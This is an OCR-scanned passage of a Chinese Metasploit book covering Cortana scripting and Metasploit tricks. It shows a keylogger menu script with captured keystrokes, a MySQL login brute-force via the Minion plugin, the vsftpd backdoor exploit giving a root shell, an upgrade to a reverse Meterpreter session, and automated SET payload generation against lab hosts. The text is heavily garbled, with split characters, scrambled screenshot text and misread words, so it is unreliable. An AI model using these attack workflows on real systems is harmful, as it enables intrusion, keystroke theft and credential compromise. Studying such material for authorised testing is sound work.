计算 机 并 取得 了 一 个 Meterpreter 命令 行 ， 这 个 弹出 菜单 选项 才 是 可 用 的 。 


这 里 的 关键 字 popup 表示 要 创建 一 个 弹出 式 菜单 项 , 而 函数 meterpreter_bottom 表示 当 用 户 
在 目标 计算 机 图 标 上 单 击 鼠标 右键 并 选中 Meterpreter 时 ， 这 个 菜单 项 就 会 出 现 。 关 键 字 item 指定 了 
菜单 中 的 各 个 选项 。 命 令 m cma 会 根据 它们 对 应 编号 的 会 话 将 命令 发 送 给 Metasploit。 

因此 ， 在 这 段 代 码 中 ， 我 们 有 三 个 选项 : Start Key Logger、Stop Key Logger 和 Show Keylogs。 它 
们 分 别 用 来 开启 键盘 监听 器 、 停 止 键盘 监听 器 以 及 显示 当前 记录 中 的 键盘 监听 数据 。 我 们 还 声明 了 三 
个 用 来 处 理发 送 给 Meterpreter 的 命令 输出 的 函数 。 现 在 在 Cortana 中 载 人 这 个 脚本 ， 成 功 渗透 目标 计 
算 机 ， 然 后 在 目标 计算 机 的 图 标 上 单 击 鼠 标 右键 ， 这 时 将 会 出 现 如 下 图 所 示 的 菜单 。 




























































































我 们 会 发 现 , 一 旦 在 被 渗透 了 的 主机 上 首 











T Meterpreter 3 3 


id Access 


Interact 
Explore 
Pivoting 


My Key Logger Start Key Logger 


ARP Scan... 


Kill Show Keylogs 
































了 一 个 新 的 菜单 选项 My Key Logger， 它 在 所 有 荣 单 选项 的 最 下 方 。 这 个 


过 的 所 有 选项 。 一 日 选择 了 这 




















个 菜单 中 的 某 一 个 选项 ， 


它 对 应 的 命令 脚本 将 会 


Stop Key Logger 


i 单 击 鼠 标 右 键 去 浏览 Meterpreter 菜单 ， 就 会 发 现 这 里 多 


菜单 选项 将 会 包含 我 们 声明 


会 运行 ,将 


会 在 Cortana 














命令 行 中 显示 输出 。 选 择 第 一 个 选项 Start Key Logger。 然 后 等 待 一 段 时 间 ， 目标 将 在 此 期 间 使 用 键盘 








完成 一 些 输入 操作 。 


单 击 了 Show Keylogs 菜单 选项 以 后 ， 在 Cortana 控制 台 上 将 会 看 到 被 渗透 计算 机 的 使 
每 一 个 字符 ， 如 下 图 所 示 。 











再 点 击 菜单 上 的 第 三 














kO” 


TKSHX\mm € 


Meterpreter 3 
Services 
Scan 


Host 





> Access 


Interact 
Explore 
Pivoting 





Kill Show Keylogs 


个 选项 Show Keylogs， 如 下 面 的 截图 所 示 。 





My Key Logger Start Key Logger 
ARP Scan... Stop Key Logger 














cortana» load /root/Desktop/cortana/keylog.cna 





Load /root/Desktop/cortana/keylog.cna 


Starting the keystroke sniffer... 


Starting the keystroke sniffer... 


Starting the keystroke sniffer... 


Dumping 
Dumping 
Dumping 
Dumping 
<LWin> 
<LWin> 
<LWin> 


<LWin> 


captured keystrokes... 


captured keystrokes... 


captured keystrokes... 


captured keystrokes... 


r «Return» Hi 


r «Return» Hi 


r «Return» Hi 


r «Return» Hi 


«Back» , this 
«Back» , this 
«Back» , this 


«Back» , this 


system is compromised by armitage 
system is compromised by armitage 
system is compromised by armitage 


system is compromised by armitage 


and Metasploit 


and Metasploit 
and Metasploit 


and Metasploit 























者 输入 的 
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11.6.5 ”界面 的 使 用 


需要 与 界面 协同 工作 的 时 候 ，Cortana 也 提供 了 十 分 灵活 的 方法 以 及 一 系列 选项 和 功能 用 来 创 
建 快捷 方式 、 图 标 ， 切 换 选 项 卡 等 。 设 想 一 下 ， 现 在 需要 添加 一 个 自 定义 功能 ， 当 我 们 在 键盘 上 按 下 
F1 键 的 时 候 ，Cortana 将 会 显示 目标 主机 的 ur 值 。 来 看 一 个 实现 了 这 个 功能 的 脚本 。 

bind F1 ( 

$sid -"'3"; 

spawn(&gu, \$sid); 

} 

sub gut 

m cmd($sid,"getuid"); 

on meterpreter getuid ( 

show message( " $3 "); 

} 

} 




















这 上段 程序 将 会 添加 一 个 快捷 键 F1。 当 这 个 快捷 键 被 按 下 的 时 候 ， 系 统 将 会 显示 当前 目标 系统 的 
UID 值 。 脚 本 中 的 关键 字 bina 表示 将 Fl 键 与 函数 的 功能 绑 定 到 一 起 。 接 着 ,我 们 定义 了 变量 $siad 
的 值 为 3( 这 个 值 是 我 们 将 要 进行 操作 的 会 话 ID )。 














函数 spawn 将 创建 一 个 新 的 Cortana 实例 , 执行 gu 函数 , 并 将 值 $ssia 设 定 为 这 个 实例 中 的 全 局 
变量 。 函 数 gu 会 向 Meterpreter 发 送 getuid 命令 。 命 令 meterpreter getuid 会 处 理 命 


的 输出 。 








令 getuid 











命令 show message 将 会 弹出 一 个 关于 命令 gecuia 输出 的 信息 。 现 在 将 新 脚本 加 载 到 Armitage 
中 ， 然 后 按 下 Fl 键 检查 这 个 脚本 是 否 可 以 正常 执行 。 





Armitage View Hosts Attacks Workspaces Help 


* (iil auxiliary 


> Z exploit 4 ( T ~ 
> ayload l ~ A. 
» (ii ee A nie 


192. 168. 10. 109 
ITKSHX\mm @ WIN-SWIKKOTKSHX 








2v - = — 


Console X | Scripts X | Cortana X | nmap x] 
cortana» load /root/Desktop/cortana/gu.cna 
Load /root/Desktop/cortana/gu.cna 
cortana» logon gu.cna 
Logging 'gu.cna' 
[00:35:04] meterpreter 3: 'getuid' at gu.cna:6 














Message 


(i) Server username: WIN-SWIKKOTKSHX\mm 
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好 了 ! 我 们 轻松 获得 了 目标 系统 的 UID， 弹 出 的 信息 框 上 清楚 地 显示 了 UID 的 值 WTN-SWIKKOTKSHXmm。 
关于 使 用 Armitage 进行 Cortana 脚本 编写 的 讨论 到 此 结束 。 











有 关 Cortana 脚本 编写 及 其 各 种 功能 的 更 多 信息 ,请 访问 http://www.fastandeasyhacking. 


com/download/cortana/cortana tutorial.pdf。 


11.7 小结 


在 本 章 中 , 我 们 仔细 学 习 了 Armitage 及 其 各 种 功能 。 首 先 介绍 了 界面 和 工作 区 的 建立 , 同时 讲解 
了 如 何 使 用 Armitage 实现 对 目标 主机 的 渗透 。 接着 探讨 了 对 远程 主机 的 客户 端 攻 击 和 后 渗透 攻击 。 之 
后 学 习 了 Cortana 和 它 的 基本 功能 ， 以 及 如 何 使 用 它 来 控制 Metasploit。 最 后 创建 了 后 渗透 模块 、 自 定 
义 菜 单 以 及 界面 。 




















拉 巧 与 窍门 











在 这 本 书 中 ， 我 们 已 经 讨论 了 关于 Metasploit 的 多 种 技术 和 方法 ， 涵 盖 了 方方面面 ， 从 漏洞 渗透 
模块 的 开发 到 Armitage 脚本 的 编写 。 但 是 如 果 想 要 发 挥 出 Metasploit 的 全 部 能 力 ， 还 需要 了 解 
Metasploit 框架 的 一 些 使 用 技巧 与 穿 门 。 本 章 将 介绍 一 些 可 以 帮助 我 们 使 用 Metasploit 进行 渗透 测试 的 
技巧 和 脚本 。 本 章 将 围绕 以 下 主题 展开 。 

OQ 自动 化 脚本 。 

a 第 三 方 搬 件 。 

口 速 查 手册 。 

口 最 佳 实践 。 

O 使 用 速记 命令 (shorthand command ) 来 节省 时 间 。 


下 面 深 入 学 习 本 书 的 最 后 一 章 ， 掌 握 一 些 非常 酷 的 技巧 与 穿 门 。 


12.1 使 用 Minion 脚本 实现 自动 化 

首先 我 们 要 介绍 一 个 非常 优秀 的 脚本 ， 自 从 使 用 它 之 后 我 就 很 少 再 去 GitHub 找 同类 的 脚本 了 。 
Minion 是 Metasploit 的 一 个 插件 , 利用 它 可 以 很 方便 地 进行 渗透 和 开发 。 可 以 从 https;//github.com/T-S- 
A/Minion 为 Metasploit 下 载 这 个 插件 。 

成 功 下 载 文 件 之 后 ， 将 其 复制 到 ~/.msf4/plugins 目录 ， 然 后 启动 msfconsole。 






















































































msf > Load minion 


Tit: 十 :十 十 D UBI EH SD SD UP oi it: 


tit 十 :十 :十 +i+ 十 :十 :十 :十 ;十 十: 十 十 :十 十 :十 Tub :二 :十 :十 十 :十 
H+ tit HER He HÉR 十 :十 HER He Hee tit H+ 十 :十 HR 
Hie He He HR HEHEHHE He He HEH HEAO HEHEHE 
Jt THE JTHE Jem gebe JH JH JE HHHO HEHEH E 
THE THHE BHHHHHHHHHHE HHH HHRH HHHHHHHHHHHE HHHHHHHEE BE THHHE 


[*] Version 1.2 (King Bob) 
[*] Successfully loaded plugin: Minion 
msf > 


在 前 面 的 章节 中 ,我们 已 经 看 到 了 如 何 使 用 1oaa 命令 来 将 插件 快速 加 载 到 Metasploit 中 。 现 在 Cm 
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我 们 使 用 相同 的 方法 来 加 载 Minion 插件 ， 如 上 面 的 截图 所 示 ， MAX load minion。 当 成 功 加 载 之 


后 ,切换 到 你 刚刚 工作 的 那个 工作 区 ， 如 果 这 个 工作 区 中 没有 主机 的 话 ， 就 进行 一 次 Nmap 扫描 。 














msf > db _ nmap -sT -sV 192.168.10.108 

[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2018-05-14 16:02 EDT 

[*] Nmap: Nmap scan report for 192.168.10.108 

[*] Nmap: Host is up (0.0016s latency). 

[*] Nmap: Not shown: 977 closed ports 

[*] Nmap: PORT STATE SERVICE VERSION 

[*] Nmap: 21/tcp open ftp vsftpd 2.3.4 

[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntul (protocol 2.8 
) 

[*] Nmap: 23/tcp open telnet Linux telnetd 

[*] Nmap: 25/tcp open smtp Postfix smtpd 

[*] Nmap: 53/tcp open domain ISC BIND 9.4.2 

[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 

[*] Nmap: 111/tcp open rpcbind 2 (RPC £100000) 

[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 
[*] Nmap: 512/tcp open exec netkit-rsh rexecd 

[*] Nmap: 513/tcp open login? 

[*] Nmap: 514/tcp open tcpwrapped 

[*] Nmap: 1099/tcp open rmiregistry GNU Classpath grmiregistry 

[*] Nmap: 1524/tcp open shell Metasploitable root shell 

[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003) 

[*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1 

[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 

[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 

[*] Nmap: 5900/tcp open vnc VNC (protocol 3.3) 

[*] Nmap: 6000/tcp open X11 (access denied) 

[*] Nmap: 6667/tcp open irc UnrealIRCd 

[*] Nmap: 8009/tcp open ajpl3 Apache Jserv (Protocol v1.3) 

[*] Nmap: 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 

[*] Nmap: MAC Address: 00:0C:29:FA:B3:E0 (VMware) 

[*] Nmap: Service Info: Hosts: mmetasploitable.localdomain, localhost, irc.Metas 
ploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux kernel 











因为 db_nmap 扫描 已 经 显示 了 大 量 的 结果 ， 所 以 下 面 看 看 Minion fü 

















axis attack 

cisco ssl vpn attack 
dns enum 

ftp attack 
glassfish attack 
http attack 
http dir enum 

http title enum 
ipmi czero 

ipmi dumphashes 
ipmi enum 

jboss enum 

jenkins attack 
jenkins enum 
joomla attack 
mssql attack 

mssql attack blank 
mssql enum 

mssql xpcmd 

mysql attack 

mysql enum 

owa sweep 

punt lockouts 
passwords generate 
pop3 attack 

report hosts 
rlogin attack 

smb enum 

smtp enum 

smtp relay check 





Description 

Try password guessing on 
Try password guessing on 
Enumerate DNS services 
Try password guessing on 
Try password guessing on GlassFish services 

Try password guessing on HTTP services 

Try guessing common web directories 

Enumerate response to web request 

Try Cipher Zero auth bypass on IPMI services 

Try to dump user hashes on IPMI services 

Enumerate IPMI services 

Enumerate Jboss services 

Try password guessing on Jenkins HTTP services 
Enumerate Jenkins services 

Try password guessing on Joomla HTTP services 

Try common users and passwords on MSSQL services 

Try a blank password for the sa user on MSSQL services| 
Enumerate MSSQL services 

Try running xp command shell on MSSQL services 

Try common users and passwords on MYSQL services 
Enumerate MYSQL services 

Sweep owa for common passwords, but pause to avoid acc 


AXIS HTTP services 
CISCO SSL VPN services 


FTP services 


Generate a list of password variants 

Try password guessing on POP3 services 

Spit out all open ports and info for each host 
Try password guessing on RLOGIN services 
Enumerate SMB services and Windows OS versions 
Enumerate SMTP users 

Check SMTP servers for open relay 








上 件 中 使 用 了 哪些 选项 。 
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KZT! 可 以 看 到 目标 主机 上 运行 着 MySQL 服务 。 我 们 按照 下 图 所 示 使 用 mysql. enum 命令 。 


msf > mysqL_enum 
VERBOSE => false 
RHOSTS => 192.168.10.108 
RHOST is not a valid option for this module. Did you mean RHOSTS? 
RHOST => 192.168.10.108 
RPORT => 3306 
[*] Auxiliary module running as background job 0. 
msf auxiliary(scanner/mysql/mysql version) > 
192.168.10.108:3306 - 192.168.10.108:3306 is running MySQL 5.0.51a-3ubuntu 
5 (protocol 10) 
[*] Scanned 1 of 1 hosts (100% complete) 
































意外 吧 ? 我 们 没有 载 入 任何 模块 、 设 置 任何 参数 ,甚至 没有 特意 启动 任何 模块 ,这 是 因为 Minion 
插件 已 经 自动 帮 我 们 完成 了 这 些 工 作 。 我 们 可 以 看 到 目标 主机 上 运行 的 MySQL 的 版 本 。 下 面 来 使 用 
Minion 中 的 MySQL 攻击 命令 。 



































msf > mysql attack 
BLANK_PASSWORDS => true 
USER AS PASS => true 
USERNAME -» root 
PASS FILE => /usr/share/john/password.lst 
VERBOSE => false 
RHOSTS -» 192.168.10.108 
RHOST is not a valid option for this module. Did you mean RHOSTS? 
RHOST => 192.168.10.108 
RPORT => 3306 
[*] Auxiliary module running as background job 0. 
msf auxiliary(scanner/mysql/mysql login) > 
192.168.10.108:3306 - 192.168.10.108:3306 - Success: 'root:' 
[*] Scanned 1 of 1 hosts (100% complete) 





msf auxiliary(scanner/mysql/mysql login) > lj 








干 得 漂亮 ! 插件 Minion 已 经 自动 蔡 我 们 完成 了 暴力 破解 攻击 ， 并 且 使 用 用 户 名 root 和 空白 密码 
成 功 登录 到 了 目标 上 。 这 个 脚本 令 人 欣喜 的 地 方 在 于 你 可 以 随时 对 其 进行 编辑 和 定制 ， 还 可 以 添加 更 
多 的 模块 和 命令 ， 这 一 点 也 有 助 于 你 进行 Metasploit 的 插件 开发 。 


12.2 用 connect 代替 Netcat 


Metasploit 中 提供 了 一 个 功能 强大 的 connect 命令 , 它 提供 了 和 Netcat 相 类 似 的 功能 。 假设 一 个 
系统 shell 正在 等 待 来 自 目标 系统 上 某 个 端口 的 连接 ， 而 我 们 不 希望 在 Metasploit 控制 台中 进行 切换 ， 
这 时 就 可 以 使 用 connect 命令 来 连接 目标 ， 如 下 图 所 示 。 






























































msf > connect -C 192.168.10.108 1524 
[*] Connected to 192.168.10.108:1524 
rootQmetasploitable:/£ pwd 


rootQmetasploitable:/£ rootQmetasploitable:/£ uname -a 

Linux metasploitable 2.6.24-16-server £1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 6 
NU/Linux 

rootQmetasploitable:/£ rootQmetasploitable:/£$ 











我 们 初始 化 了 一 个 来 自 Metasploit 框架 监听 器 的 连接 ， 当 我 们 还 没有 通过 Metasploit 获得 反 向 连 
接 时 ， 就 可 以 使 用 它 去 连接 目标 。 1 
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12.3 shell 升级 与 后 台 切 换 


有 些 时 候 , 我 们 可 能 不 需要 直接 和 被 渗透 主机 进行 互动 。 在 这 种 情况 下 , 我 们 就 可 以 使 用 参数 -z， 
这 样 Metasploit 就 会 将 成 功 渗透 产生 的 新 会 话 切 换 到 后 台 ， 如 下 图 所 示 。 






































msf exploit(unix/ftp/vsftpd 234 backdoor) > exploit -z 


[*] 192.168.10.108:21 - Banner: 220 (vsFTPd 2.3.4) 

[*] 192.168.10.108:21 - USER: 331 Please specify the password. 
192.168.10.108:21 - Backdoor service has been spawned, handling... 
192.168.10.108:21 - UID: uid-0(root) gid-0(root) 

[*] Found shell. 

[*] Command shell session 2 opened (192.168.10.105:35503 -> 192.168.10.108:6200) 

at 2018-05-14 17:03:38 -0400 

[*] Session 2 created in the background. 

Imsf exploit(unix/ftp/vsftpd 234 backdoor) > 


可 以 看 到 ， 我 们 已 经 打开 了 一 个 shell 命令 会 话 ， 不 过 像 Meterpreter TERARI nia 是 
我 们 所 需要 的 。 在 这 种 情况 下 ， 我 们 就 可 以 使 用 参数 -u 来 升级 这 个 命令 会 话 ， 这 个 过 程 如 下 图 所 示 。 


msf exploit(unix/ftp/vsftpd 234 backdoor) > sessions -u 2 
[*] Executing 'post/multi/manage/shell to meterpreter' on session(s): [2] 









































[*] Upgrading session ID: 2 

[*] Starting exploit/multi/handler 

[*] Started reverse TCP handler on 192.168.10.105:4433 

[*] Sending stage (857352 bytes) to 192.168.10.108 

[*] Meterpreter session 3 opened (192.168.10.105:4433 -» 192.168.10.108:58806) at 2018-05-14 17:04:59 -0400 
|[[*] Command stager progress: 100.00% (773/773 bytes) 


干 得 漂亮 ! 我 们 已 经 成 功 将 命令 会 话 升 级 到 了 Meterpreter， 从 而 获得 了 更 高 的 控制 权限 。 


12.4 ”命名 约定 


在 大 型 渗透 测试 场景 中 ， 我 们 需要 同时 对 大 量 的 系统 进行 测试 ， 因 此 也 会 取得 数量 众多 的 
Meterpreter shell。 此 时 ， 最 好 为 这 idis qe rua en 文 个 场景 。 


msf > sessions -l 

















Active sessions 


Id Name Type Information 
Connection 


2 shell cmd/unix 
192.168.10.105:35503 -> 192.168.10.108:6200 (192.168.10.108) 
3 meterpreter x86/linux uid-0, gid-0, euid-0, egid-0 @ metasploitab| 
le.localdomain 192.168.10.105:4433 -> 192.168.10.108:58806 (192.168.10.108) 
4 meterpreter x86/windows  WIN-QBJLDF2RUOTMApex (à WIN-QBJLDF2RUOT 
192.168.10.105:4444 -» 192.168.10.109:49470 (192.168.10.109) 








msf > 目 


我 们 可 以 使 用 参数 -n 来 为 一 个 shel 起 名 ， 这 个 过 程 如 下 图 所 示 。 
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sf > sessions -i 2 -n "Shell on Metasploitable" 

[*] Session 2 named to Shell on Metasploitable 

msf > sessions -i 3 -n "Meterpreter on Metasploitable" 
[*] Session 3 named to Meterpreter on Metasploitable 
msf » sessions -i 4 -n "Meterpreter on HFS Server 2012" 
[*] Session 4 named to Meterpreter on HFS Server 2012 
msf » sessions -l 


Active sessions 


Id Name Type Information 


2 Shell on Metasploitable Shell cmd/unix 
5503 -> 192.168.10.108:6200 (192.168.10.108) 

3  Meterpreter on Metasploitable ^ meterpreter x86/linux uid-0, gid-0, euid-0, egid-0 @ metasploitable.localdomain 
433 -» 192.168.10.108:58806 (192.168.10.108) 

4  Meterpreter on HFS Server 2012 meterpreter x86/windows  WIN-QBJLDF2RUOTMApex (à WIN-QBJLDF2RUOT 
444 -» 192.168.10.109:49470 (192.168.10.109) 


























取 的 名 字 最 好 既 容 易 理 解 又 方便 记忆 ， 就 像 我 们 在 上 图 中 做 的 那样 。 


更 改 提 示 符 与 使 用 数据 库 变 量 


在 自己 喜欢 的 渗透 测试 框架 上 显示 自 定义 提示 符 是 不 是 很 酷 ” 其 实 要 做 到 这 一 点 并 不 复杂 。 要 在 
Metasploit 中 显示 自 定 义 的 提示 符 ， 只 需 对 提示 符 变 量 进行 设置 。 抛 开 能 带 来 的 乐趣 不 说 ， 假 设 你 是 
个 记性 不 好 的 人 ， 这 样 做 也 可 以 帮助 你 记 住 一 些 事情 。 例 如 ， 如 果 容 易 忘 记 当 前 使 用 的 工作 区 ， 你 就 
可 以 使 用 数据 库 变 量 sw 将 其 设置 为 提示 符 ， 如 下 图 所 示 。 



























































msf > set Prompt MsfGuy 
Prompt => MsfGuy 

MsfGuy> workspace -a AcmeScan 
[*] Added workspace: AcmeScan 
MsfGuy» workspace AcmeScan 
[*] Workspace: AcmeScan 
MsfGuy» set Prompt MsfGuy :%W 
Prompt => MsfGuy :%W 
MsfGuy:AcmeScan» fJ 


另外 ， 你 可 以 执行 如 下 所 示 的 一 些 操作 。 


MSF> set prompt %D %H %J %L %S %T %U %W 
prompt => %D %H %J %L %S %T %U %W 
/root kali 6 192.168.10.105 3 17:56:53 root AcmeScan> 





























可 以 看 到 ， 这 里 的 sp 表示 当前 本 地 工作 目录 ，%H 表示 主机 名 s 显示 当前 正在 运行 的 作业 数 
t, sn 表示 本 地 卫 地址 (使 用 这 个 变量 非常 方便 ), ss 表示 我 们 当前 所 拥有 的 会 话 数量 ，sT 表示 时 
IRR, eu 表示 用 户 名 ，sw 表示 工作 空间 。 


12.5 在 Metasploit 中 保存 配置 


很 多 时 候 , 我 们 为 某 个 扫描 建立 了 专门 的 工作 区 , 最 后 却 忘 记 将 扫描 的 结果 保存 在 这 个 工作 区 中 ， 
而 是 仍然 保存 在 了 默认 工作 区 中 。 不 过 ， 如 果 你 掌握 了 Metasploit 中 的 save 命令 ， 那么 这 个 问题 就 
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迎 叉 而 解 了 。 假 设 你 现在 已 经 切换 了 工作 区 ， 也 完成 了 自 定义 提示 符 和 其 他 一 些 操作 ,那么 就 可 以 输 
入 save 命令 来 保存 配置 了 。 这 意味 着 当下 一 次 启动 Metasploit 的 时 候 ， 你 将 会 看 到 和 之 前 一 样 的 参 








数 和 工作 区 ， 如 下 图 所 示 。 





MsfGuy> workspace AcmeScan 

[*] Workspace: AcmeScan 

MsfGuy> set Prompt MsfGuy:%W 

Prompt => MsfGuy:*sW 

MsfGuy:AcmeScan» save 

Saved configuration to: /root/.msf4/config 
MsfGuy:AcmeScan» exit 




















tun 


HT, ERNE 

















新 启动 Metasploit， 并 查看 这 里 面 的 设置 是 否 和 之 前 一 模 一 样 。 





Aiee, Killing Interrupt handler 
Kernel panic: Attempted to kill the idle task! 
In swapper task - not syncing 


=[ metasploit v4.16.52-dev- ] 
+ -- ---[ 1753 exploits - 1006 auxiliary - 307 post ] 
+ -- ---[ 536 payloads - 40 encoders - 10 nops ] 
+ -- ---[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 
MsfGuy:AcmeScan » workspace 
default 
* AcmeScan 





MsfGuy:AcmeScan > 


Code: 00 00 00 00 M3 T4 SP LO 1T FR 4M 3W OR K! V3 R5 IO N4 00 00 00 00 


























12.6 ”使 用 内 联 handler 以 及 重 命名 任务 


Metasploit 中 提供 的 handler 命令 可 以 快速 地 建立 handler， 过 程 如 下 




















是 的 ! Metasploit 从 配置 文件 中 加 载 了 所 有 内 容 。 从 现在 起 ， 你 再 也 不 用 担心 忘记 切换 工作 空间 了 。 


图 所 示 。 








[*] Payload handler running as background job 0. 





[*] Started reverse TCP handler on 192.168.10.105:4444 


MsfGuy:AcmeScan » handler -p windows/meterpreter/reverse tcp -H 192.168.10.105 -P 4444 











从 上 图 中 可 以 看 到 , 我 们 可 以 使 用 参数 -p KELIR, 使 用 参数 -H 和 -P 来 指定 目标 主机 和 端 
口 。 使 用 handler 命令 创建 的 handler 会 在 后 台 工 作 。 这 里 提 到 的 后 台 工 作 任务 可 以 使 用 rename_job 
































命令 来 改名 ， 下 面 给 出 了 一 个 完整 的 示例 。 
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MsfGuy:AcmeScan > rename job 0 "BackGround Handler 4444" 
[*] Job 6 updated 
MsfGuy:AcmeScan » jobs 


Jobs 


Id Name Payload Payload opts 


©  BackGround Handler 4444 windows/meterpreter/reverse tcp tcp://192.168.10.105:4444 








MsfGuy:AcmeScan > 目 





12.7 ”在 多 个 Meterpreter 上 运行 命令 


错 ， 我 们 可 以 利用 sessions 命令 和 参数 -c 在 多 个 打开 的 Meterpreter 会 话 中 执行 命令 ， 如 下 
图 所 示 。 








MSF > sessions -C getuid 

[-] Session #2 is not a Meterpreter shell. Skipping... 

[*] Running 'getuid' on meterpreter session 3 (192.168.10.108) 
Server username: uid-0, gid-0, euid-0, egid-0 

[*] Running 'getuid' on meterpreter session 4 (192.168.10.109) 
Server username: WIN-QBJLDF2RUOTMApex 

MSF » 


男 外 ， 在 上 图 中 我 们 也 看 到 了 ， n 十 分 智能 地 跳 过 了 一 个 非 Meterpreter 会 话 ， 而 所 有 的 
Meterpreter 会 话 中 都 已 经 成 功 执行 了 这 条 命令 。 


12.8 ”社会 工程 学 工具 包 的 自动 化 


社会 工程 学 工具 包 (SET) 是 基于 Python 语言 开发 的 ， 它 主要 以 人 作为 渗透 测试 的 目标 。 我 们 可 
以 使 用 SET 来 完成 钓鱼 攻击 、Web 劫持 攻击 〈 让 受害 者 以 为 要 访问 的 网 页 已 经 移动 到 其 他 位 置 )、 文 
件 格 式 攻击 ( 渗透 目标 系统 上 的 特定 软件 ) 以 及 其 他 各 种 各 样 的 攻击 。SET 最 方便 之 处 在 于 菜单 驱动 
的 操作 ， 利 用 它 可 以 快速 启动 各 种 攻击 向 量 。 















































Gp SET 的 使 用 说 明 请 参见 : https;//www.social-engineer.org/framework/se-tools/computer- 


based/social-engineer-toolkit-set/.; 





SET 对 于 生成 客户 端 渗透 模板 已 经 很 方便 了 , 不 过 如 果 使 用 自动 化 脚本 的 话 , 这 一 切 会 更 加 便利 ， 
下 面 就 是 一 个 示例 。 








Iroot@mm: /usr/share/set# ./seautomate se-script 

[*] Spawning SET in a threaded process... 

[*] Sending command 1 to the interface... 

[*] Sending command 4 to the interface... 

[*] Sending command 2 to the interface... 

[*] Sending command 192.168.10.103 to the interface... 

[*] Sending command 4444 to the interface... 

[*] Sending command yes to the interface... 

[*] Sending command default to the interface... 

[*] Finished sending commands, interacting with the interface.. 














298 第 12 章 


技巧 与 窍门 





在 上 图 中 ,我 们 为 seautomate 工具 指定 了 脚本 se-script， 这 个 操作 将 会 产 4 

















一 个 攻击 载荷 并 自 








动 建立 好 一 个 对 应 的 handler。 如 果 想 了 解 这 个 脚本 的 工作 原理 ， 可 以 打开 它 查 看 里 面 的 内 容 。 


你 可 能 很 想 知道 脚本 中 的 这 些 数字 是 如 何 产生 攻 了 


GNU nano 2.2. File: se-script Modified 





192.168. 
4444 
lves 


10.103 




















Edu, DUMMIES. handler 的 。 


正如 之 前 所 讨论 的 一 样 ，SET 是 一 个 菜单 驱动 的 工具 。 所 以 这 个 脚本 中 的 数字 就 表示 你 在 菜单 中 
下 面 我 们 把 这 个 脚本 分 解 来 看 。 
表示 选择 Social-Engineering Attacks 菜单 中 的 第 一 个 选项 。 


所 选择 的 选项 。 





脚本 中 的 第 一 个 数字 是 1， 


脚本 中 的 第 二 个 数字 为 4， 表示 如 下 








+r 




















social-Engineering Attacks 
Penetration Testing (Fast-Track) 
Third Party Modules 

Update the social-Engineer Toolkit 
Update SET configuration 

Help, Credits, and About 


Exit the Social-Engineer Toolkit 

















1) 
2) 
3) 
4) 
5) 
6) 
7) 
8) 
9) 
10) 
11) 


99) 





Spear-Phishing Attack Vectors 
Website Attack Vectors 
Infectious Media Generator 
Create a Payload and Listener 
Mass Mailer Attack 
Arduino-Based Attack Vector 
Wireless Access Point Attack Vector 
QRCode Generator Attack Vector 
Powershell Attack Vectors 

SMS Spoofing Attack Vector 
Third Party Modules 


Return back to the main menu. 











图 所 示 ， 选 中 了 Create a Payload and Listener 选项 。 











再 下 面 的 数字 为 2， 表示 所 选择 的 攻击 载荷 类 型 为 Windows Reverse TCP Meterpreter， 如 下 图 所 示 。 
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1) Windows Shell Reverse TCP 

2) Windows Reverse TCP Meterpreter 

3) Windows Reverse TCP VNC DLL 

4) Windows Shell Reverse TCP X64 

5) Windows Meterpreter Reverse TCP X64 
6) Windows Meterpreter Egress Buster 
7) Windows Meterpreter Reverse HTTPS 
8) Windows Meterpreter Reverse DNS 

9) Download/Run your Own Executable 








set:payloads»2 


接 下 来 ， 我 们 需要 指定 监听 器 的 IP 地 址 ， 就 是 脚本 中 的 192.168.10.113。 我 们 可 以 看 到 这 个 值 。 











set:payloads» IP address for the payload listener (LHOST):192.168.10.113 


在 下 一 个 命令 中 ,我 们 输入 了 4444， 这 是 监听 器 所 使 用 的 端口 。 




















set:payloads» Enter the PORT for the reverse listener:4444 
Generating the payload.. please be patient. 
Payload has been exported to the default SET directory located under: /root/.set/payload.exe 


我 们 在 下 一 条 命令 中 使 用 了 yes。 这 个 值 表 示 同 意 监 听 器 的 初始 化 。 


























set:payloads» Do you want to start the payload and listener now? (yes/no):yes 








自动 输入 yes 之 后 , 控制 权 就 交 给 Metasploit T, 它 会 自动 建立 一 个 反 向 的 handler, 如 下 图 所 示 。 








[*] Processing /root/.set/meta config for ERB directives. 
resource (/root/.set/meta config)> use multi/handler 
resource (/root/.set/meta config)> set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 

resource (/root/.set/meta config)» set LHOST 192.168.10.113 
ILHOST -» 192.168.10.113 

resource (/root/.set/meta config)» set LPORT 4444 

ILPORT => 4444 

resource (/root/.set/meta config)» set ExitonSession false 
ExitonSession => false 

resource (/root/.set/meta config)» exploit -j 

[*] Exploit running as background job. 


我 们 可 以 按照 前 面 讨论 的 方法 来 实现 SET 中 的 任何 攻击 。SET 本 身 就 已 经 非常 方便 快速 了 , 不 过 
如 果 使 用 seautomate 工具 的 话 ， 你 就 会 有 “ 飞 一 样 ” 的 感觉 。 




















12.9 Metasploit 和 渗透 测试 速 查 手册 


你 可 以 通过 访问 以 下 链接 找到 一 些 优秀 的 Metasploit 速 查 手册 : 





L1 https://www.sans.org/security-resources/sec560/misc tools sheet vl.pdf 





O https://null-byte.wonderhowto.com/how-to/hack-like-pro-ultimate-command-cheat-sheet-for-metasploits- 
meterpreter-0149146/ 
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口 https://null-byte.wonderhowto.com/how-to/hack-like-pro-ultimate-list-hacking-scripts-for-metasploits- 
meterpreter-0149339/ 
关于 渗透 测试 的 更 多 信息 可 以 访问 SANS 的 官方 网 站 : https://www.sans.org/security-resources/ 
posters/pen-testing。 另 外 ，https:Wgithub.comy/coreb1ltawesome-pentest-cheat-sheets 提供 了 很 多 渗透 测试 
